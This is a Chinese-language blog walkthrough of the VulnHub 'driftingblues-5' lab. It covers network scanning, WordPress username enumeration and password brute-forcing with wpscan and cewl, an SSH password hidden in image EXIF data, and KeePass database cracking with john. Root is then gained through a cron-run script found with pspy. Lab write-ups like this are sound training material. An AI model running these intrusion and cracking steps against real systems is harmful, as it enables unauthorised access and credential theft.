vulnhub靶场之driftingblues-5

本文详细描述了如何在一个虚拟环境中设置靶场,包括下载、启动和网络探测。通过信息收集,找到WordPress登录点并进行爆破,利用Exiftool解析文件获取SSH密码。学习了新工具如KDBX文件破解和临时web服务的scp命令。最终通过pspy64工具发现定时执行的脚本,实现提权获取flag。
摘要由CSDN通过智能技术生成

一.环境搭建

1.靶场描述

get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.
This works better with VirtualBox rather than VMware.
 

2.靶场下载

https://www.vulnhub.com/entry/driftingblues-5,662/
 

image-20240219204909314

3.靶场启动

image-20240219204940902

二.信息收集

1.寻找靶场真实ip

nmap -sP 192.168.1.0/24
 

image-20240219205146654

arp-scan -l
 

image-20240219205243248

靶场真实ip为192.168.1.12
 

2.探测端口及服务

nmap -p- -sV 192.168.1.12
 

image-20240219210946691

三.渗透测试

1.访问web服务

image-20240219211056872

我们可以看到框架是wordpress,猜测是wordpress登录,需要爆破

2.扫描web服务

1)nikto扫描网站

nikto -h http://192.168.1.12
 

我们扫描到2个目录,一个是登录页面,另一个是文件上传路径

2)dirsearch目录扫描

dirsearch -u 192.168.1.12 -e * -x 403 --random-agent
 

image-20240219211758373

目前我们掌握的信息是wordpress登录页面和一个文件上传路径

3.渗透测试

1)wpscan爆破

我们爆破用户名

wpscan --url http://192.168.1.12 -e u
 

image-20240219213352029

image-20240219213439506

我们爆破出来5个用户名,我们创建字典

cewl http://192.168.1.12/ > MS02423.txt
 

image-20240219213723395

我们进行爆破即可

wpscan --url http://192.168.1.12 -U '/home/kali/桌面/1.txt'  -P MS02423.txt
 

image-20240219214441531

image-20240219214458360

我们爆破出来一个用户名和密码

gill:interchangeable 
 

2)wordpress登录

我们进行登录

image-20240219214803830

我们进行查看,但是没有发现有用的信息

3)访问文件上传路径

http://192.168.1.12/wp-content/uploads/2021/02/
 

我们可以看到是6个图片,我们进行查看

image-20240219212026753

前面5个图片都是首页的图片,所以我们就不用查看了,我们直接查看第六个图片

我们下载到kali里面,进行查看

wget http://192.168.1.12/wp-content/uploads/2021/02/dblogo.png
 

image-20240219212505996

这里使用一个工具exiftool, 这个工具用来对EXIF信息解析

exiftool dblogo.png 
 

image-20240219215235795

我们得到了ssh登录的密码,我们进行登录59583hello

4)ssh登录

ssh gill@192.168.1.12
 

image-20240219215514583

我们可以看到登录成功,我们查看根目录可以看到一个user.txt

我们进行查看,找到第一个flag

image-20240219215648534

5)提权

find / -perm -u=s -type f 2>/dev/null
 

image-20240219215812292

但是没有找到任何可以提权的,我们发现在根目录下,有一个keyfile.kdbx文件(第一次遇到这种文件)什么是DKBX文件?

https://www.solvusoft.com/zh-cn/file-extensions/file-extension-kdbx/
 

image-20240220222142386

image-20240220222614479

我们开启临时web服务,但是报错了,我们使用另一条命令

python -m SimpleHTTPServer 80
 

scp gill@192.168.1.12:/home/gill/key* /root
 

这是一个使用SCP(Secure Copy Protocol)命令的示例,该命令用于在远程计算机和本地计算机之间安全地复制文件。具体来说,这个命令是将远程计算机上gill用户的/home/gill/目录中以”key”开头的文件复制到本地计算机的/root/目录。

image-20240220223515818

将 keyfile.kdbx 内容转为 john 支持的格式:

keepass2john keyfile.kdbx > Keepasshash.txt
 

在使用john破解密码:

john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt
 

image-20240220224257030

我们进行登录

https://app.keeweb.info/
 

KeeWeb 是一个开源的密码管理器,类似于 KeePass。它提供了一个用户友好的界面,允许用户存储和管理他们的密码,并使用加密技术来保护这些密码。KeeWeb 可以与多个平台和设备兼容,并且用户可以选择在本地存储密码数据库,或者使用云服务进行同步

image-20240220224836713

发现了六个密码分别为:

2real4surreal 
buddyretard
closet313
exalted
fracturedocean
zakkwylde
 

尝试使用这些密码进去 但是并没有发现可用的信息,靶机下载pspy64:https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64,使用WinSCP把pspy64传到靶机的/home/gill/中

image-20240220225128325

chmod 777 pspy64
./pspy64 
 

发现了根目录下,每分钟就执行一个key.sh的脚本文件

image-20240220225241069

使用keyfile.kdbx文件中的名称,新建文件fracturedocean然后建立正确的文件名 就会获得一个新的文件rootcreds.txt

image-20240220225333284

如果生成了cat一下发现了 root的账号密码!!!

image-20240220225406863

查看flag

image-20240220225435590

四.相关知识

1.cewl 生成字典和wpscan 工具暴力破解的使用
2.Exiftool 这个工具用来对EXIF信息解析(第一次了解这个工具的使用和作用)
3..kdbx文件密码破解(新知识点,第一次做花的时间比较多)
4.如果临时开启不了web服务 可以使用scp 这个命令(非常好用!!)
5.解密 keepass 数据库获取密码(虽然没啥用 但是也是第一次了解 新知识点)
6.定时提权 下载脚本pspy64 查看 创建key 文件提权

  • 30
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MS02423

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值